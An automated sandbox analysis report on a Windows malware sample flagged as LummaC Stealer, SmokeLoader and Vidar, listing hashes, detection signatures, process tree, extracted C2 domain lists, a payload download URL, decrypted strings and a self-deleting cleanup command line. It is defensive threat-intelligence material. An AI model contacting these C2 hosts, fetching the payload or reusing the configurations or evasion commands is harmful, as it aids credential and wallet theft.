Windows Analysis Report
xvJv1BpknZ.exe

Overview

General Information

Sample name:xvJv1BpknZ.exe
renamed because original name is a hash value
Original sample name:c5261e67bd6d58771e27d7214e8f1c8f.exe
Analysis ID:1448044
MD5:c5261e67bd6d58771e27d7214e8f1c8f
SHA1:6fd857b3ebdb3888785d41f20277bc4e045bf704
SHA256:09d1eba82060a4ff75575b471d563a5e02485e0aaa3afe743802a50d6e987410
Tags:32exe

Detection

LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected CryptOne packer
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected SmokeLoader
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Found many strings related to Crypto-Wallets (likely being stolen)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Opens network shares
Query firmware table information (likely to detect VMs)
Sample uses process hollowing technique
Sample uses string decryption to hide its real strings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • xvJv1BpknZ.exe (PID: 7440 cmdline: "C:\Users\user\Desktop\xvJv1BpknZ.exe" MD5: C5261E67BD6D58771E27D7214E8F1C8F)
    • explorer.exe (PID: 4084 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • 5876.exe (PID: 7992 cmdline: C:\Users\user\AppData\Local\Temp\5876.exe MD5: EA9DD1EAE2E521666D3F06382104EC10)
        • WerFault.exe (PID: 768 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7992 -s 468 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • EE6.exe (PID: 1640 cmdline: C:\Users\user\AppData\Local\Temp\EE6.exe MD5: 2095273C7B526065D7094738AA070E1B)
        • katDDA4.tmp (PID: 7360 cmdline: C:\Users\user\AppData\Local\Temp\katDDA4.tmp MD5: 66064DBDB70A5EB15EBF3BF65ABA254B)
          • cmd.exe (PID: 4676 cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\katDDA4.tmp" & rd /s /q "C:\ProgramData\FBGIDHCAAKEB" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 4280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • timeout.exe (PID: 3848 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • etrtabd (PID: 7856 cmdline: C:\Users\user\AppData\Roaming\etrtabd MD5: C5261E67BD6D58771E27D7214E8F1C8F)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name: SmokeLoader
Description: The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
Attribution: SMOKY SPIDER
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
{"C2 url": ["boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "whispedwoodmoodsksl.shop"], "Build id": "swg5EG--"}
{"C2 url": ["https://steamcommunity.com/profiles/76561199689717899"], "Botnet": "42d0618304a88d6476bc55d33c23d7e6", "Version": "9.8"}
{"Version": 2022, "C2 list": ["http://dbfhns.in/tmp/index.php", "http://guteyr.cc/tmp/index.php", "http://greendag.ru/tmp/index.php", "http://lobulraualov.in.net/tmp/index.php"]}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_Vidar_2 | Yara detected Vidar | Joe Security |

Source | Rule | Description | Author | Strings
0000000C.00000002.2532896243.0000000000572000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0000000B.00000002.2056003216.0000000004279000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Crypt | Yara detected CryptOne packer | Joe Security |
00000006.00000002.1650939985.00000000021E0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
00000006.00000002.1650939985.00000000021E0000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_4e31426e | unknown | unknown | 0x664:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000006.00000002.1651356917.0000000002441000.00000004.10000000.00040000.00000000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |

Source | Rule | Description | Author | Strings
11.2.EE6.exe.4470000.1.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
11.2.EE6.exe.4470000.1.unpack | INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation | Detects executables containing potential Windows Defender anti-emulation checks | ditekSHen | 0x201f0:$s1: JohnDoe; 0x201e8:$s2: HAL9TH
11.2.EE6.exe.4247719.0.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
11.2.EE6.exe.4247719.0.unpack | INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation | Detects executables containing potential Windows Defender anti-emulation checks | ditekSHen | 0x201f0:$s1: JohnDoe; 0x201e8:$s2: HAL9TH
11.2.EE6.exe.44b0000.2.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |

System Summary

Source: Process started, Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\etrtabd, CommandLine: C:\Users\user\AppData\Roaming\etrtabd, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\etrtabd, NewProcessName: C:\Users\user\AppData\Roaming\etrtabd, OriginalFileName: C:\Users\user\AppData\Roaming\etrtabd, ParentCommandLine: , ParentImage: , ParentProcessId: 660, ProcessCommandLine: C:\Users\user\AppData\Roaming\etrtabd, ProcessId: 7856, ProcessName: etrtabd

AV Detection

Source: whispedwoodmoodsksl.shop, Avira URL Cloud: Label: malware
Source: http://guteyr.cc/tmp/index.php, Avira URL Cloud: Label: malware
Source: https://whispedwoodmoodsksl.shop/D, Avira URL Cloud: Label: malware
Source: https://whispedwoodmoodsksl.shop/H, Avira URL Cloud: Label: malware
Source: http://45.129.96.86/file/update.exe, Avira URL Cloud: Label: malware
Source: https://whispedwoodmoodsksl.shop/n, Avira URL Cloud: Label: malware
Source: holicisticscrarws.shop, Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\5876.exe, Avira: detection malicious, Label: TR/AVI.AceCrypter.javlp
Source: 00000006.00000002.1650939985.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://dbfhns.in/tmp/index.php", "http://guteyr.cc/tmp/index.php", "http://greendag.ru/tmp/index.php", "http://lobulraualov.in.net/tmp/index.php"]}
Source: 0000000B.00000002.2056487759.00000000044B0000.00000004.00001000.00020000.00000000.sdmp, Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199689717899"], "Botnet": "42d0618304a88d6476bc55d33c23d7e6", "Version": "9.8"}
Source: 7.3.5876.exe.2170000.0.raw.unpack, Malware Configuration Extractor: LummaC {"C2 url": ["boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "whispedwoodmoodsksl.shop"], "Build id": "swg5EG--"}
Source: whispedwoodmoodsksl.shop, Virustotal: Detection: 17%
Source: dbfhns.in, Virustotal: Detection: 5%
Source: http://guteyr.cc/tmp/index.php, Virustotal: Detection: 15%
Source: http://45.129.96.86/file/update.exe, Virustotal: Detection: 20%
Source: C:\Users\user\AppData\Local\Temp\5876.exe, ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Roaming\etrtabd, ReversingLabs: Detection: 28%
Source: xvJv1BpknZ.exe, Virustotal: Detection: 34%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\etrtabd, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\EE6.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\5876.exe, Joe Sandbox ML: detected
Source: xvJv1BpknZ.exe, Joe Sandbox ML: detected
Source: 7.3.5876.exe.2170000.0.raw.unpack, String decryptor: boredimperissvieos.shop
Source: 7.3.5876.exe.2170000.0.raw.unpack, String decryptor: holicisticscrarws.shop
Source: 7.3.5876.exe.2170000.0.raw.unpack, String decryptor: sweetsquarediaslw.shop
Source: 7.3.5876.exe.2170000.0.raw.unpack, String decryptor: plaintediousidowsko.shop
Source: 7.3.5876.exe.2170000.0.raw.unpack, String decryptor: miniaturefinerninewjs.shop
Source: 7.3.5876.exe.2170000.0.raw.unpack, String decryptor: zippyfinickysofwps.shop
Source: 7.3.5876.exe.2170000.0.raw.unpack, String decryptor: obsceneclassyjuwks.shop
Source: 7.3.5876.exe.2170000.0.raw.unpack, String decryptor: acceptabledcooeprs.shop
Source: 7.3.5876.exe.2170000.0.raw.unpack, String decryptor: whispedwoodmoodsksl.shop
Source: 7.3.5876.exe.2170000.0.raw.unpack, String decryptor: lid=%s&j=%s&ver=4.0
Source: 7.3.5876.exe.2170000.0.raw.unpack, String decryptor: TeslaBrowser/5.5
Source: 7.3.5876.exe.2170000.0.raw.unpack, String decryptor: - Screen Resoluton:
Source: 7.3.5876.exe.2170000.0.raw.unpack, String decryptor: - Physical Installed Memory:
Source: 7.3.5876.exe.2170000.0.raw.unpack, String decryptor: Workgroup: -
Source: 7.3.5876.exe.2170000.0.raw.unpack, String decryptor: swg5EG--
Source: C:\Users\user\AppData\Local\Temp\5876.exe, Code function: 7_2_0041537E CryptUnprotectData,7_2_0041537E
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp, Code function: 12_2_6D11A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,12_2_6D11A9A0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp, Code function: 12_2_6D1625B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,12_2_6D1625B0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp, Code function: 12_2_6D0E4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,12_2_6D0E4420
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp, Code function: 12_2_6D114440 PK11_PrivDecrypt,12_2_6D114440
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp, Code function: 12_2_6D1144C0 PK11_PubEncrypt,12_2_6D1144C0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp, Code function: 12_2_6D13A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,12_2_6D13A730
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp, Code function: 12_2_6D11A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,12_2_6D11A650
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp, Code function: 12_2_6D0F8670 PK11_ExportEncryptedPrivKeyInfo,12_2_6D0F8670
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp, Code function: 12_2_6D0FE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,12_2_6D0FE6E0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp, Code function: 12_2_6D140180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,12_2_6D140180
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp, Code function: 12_2_6D1143B0 PK11_PubEncryptPKCS1,PR_SetError,12_2_6D1143B0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp, Code function: 12_2_6D13BD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,12_2_6D13BD30
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp, Code function: 12_2_6D0F7D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,12_2_6D0F7D60
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp, Code function: 12_2_6D137C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,12_2_6D137C00
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp, Code function: 12_2_6D113FF0 PK11_PrivDecryptPKCS1,12_2_6D113FF0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp, Code function: 12_2_6D139EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,12_2_6D139EC0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp, Code function: 12_2_6D113850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,12_2_6D113850
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp, Code function: 12_2_6D119840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate,12_2_6D119840
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp, Code function: 12_2_6D13DA40 SEC_PKCS7ContentIsEncrypted,12_2_6D13DA40
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp, Code function: 12_2_6D113560 PK11_Decrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,12_2_6D113560

                    Compliance

                    barindex
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeUnpacked PE file: 7.2.5876.exe.400000.0.unpack
                    Source: xvJv1BpknZ.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53066 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53068 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53071 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53074 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53076 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53077 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53082 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.102.42.29:443 -> 192.168.2.8:53085 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53086 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 37.27.34.12:443 -> 192.168.2.8:53087 version: TLS 1.2
                    Source: Binary string: mozglue.pdbP source: katDDA4.tmp, 0000000C.00000002.2589136080.000000006E6CD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.12.dr
                    Source: Binary string: freebl3.pdb source: freebl3[1].dll.12.dr, freebl3.dll.12.dr
                    Source: Binary string: freebl3.pdbp source: freebl3[1].dll.12.dr, freebl3.dll.12.dr
                    Source: Binary string: nss3.pdb@ source: katDDA4.tmp, 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.12.dr, nss3[1].dll.12.dr
                    Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.12.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.12.dr, vcruntime140.dll.12.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.12.dr, msvcp140[1].dll.12.dr
                    Source: Binary string: nss3.pdb source: katDDA4.tmp, 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.12.dr, nss3[1].dll.12.dr
                    Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.12.dr
                    Source: Binary string: mozglue.pdb source: katDDA4.tmp, 0000000C.00000002.2589136080.000000006E6CD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.12.dr
                    Source: Binary string: softokn3.pdb source: softokn3[1].dll.12.dr
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov eax, dword ptr [esi+00000910h]7_2_00427353
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov eax, dword ptr [esi+00000080h]7_2_00427353
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov word ptr [eax], cx7_2_004168EF
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov ecx, dword ptr [esp+10h]7_2_00409960
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov ecx, dword ptr [esp+10h]7_2_00409960
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+20h]7_2_00404970
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov ecx, dword ptr [esp+00000084h]7_2_00415FE1
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then dec edx7_2_0043B050
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h7_2_00417062
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov ecx, dword ptr [esi+04h]7_2_00417062
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov edx, dword ptr [esi+00000080h]7_2_00426174
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov eax, dword ptr [esp+54h]7_2_004381BB
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov edx, dword ptr [esi+00000080h]7_2_00426271
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov edx, dword ptr [esi+00000080h]7_2_00426284
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov eax, dword ptr [esp+000001E0h]7_2_004102B2
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]7_2_004164D2
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov eax, 00008000h7_2_00403570
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then cmp cl, 0000002Eh7_2_00421580
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]7_2_004025A0
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then cmp byte ptr [ebp+00h], 00000000h7_2_00414660
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov edi, ebx7_2_00436670
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then movzx ebx, byte ptr [edx]7_2_00431680
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov eax, dword ptr [esp+000000C0h]7_2_004106B1
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov dword ptr [esp+000005F0h], 00000000h7_2_004138D2
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]7_2_004248E0
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov ecx, dword ptr [esi+30h]7_2_00423931
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov ecx, dword ptr [esi+30h]7_2_00423AD0
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then jmp edx7_2_00422AFB
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov eax, dword ptr [esp+4Ch]7_2_00415AFA
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]7_2_0040CB10
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov eax, dword ptr [esp+000001E0h]7_2_0040FBB4
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then jmp edx7_2_0041CCD0
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov edx, dword ptr [esi+00000080h]7_2_00425CEE
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov edx, dword ptr [esi+10h]7_2_00423C97
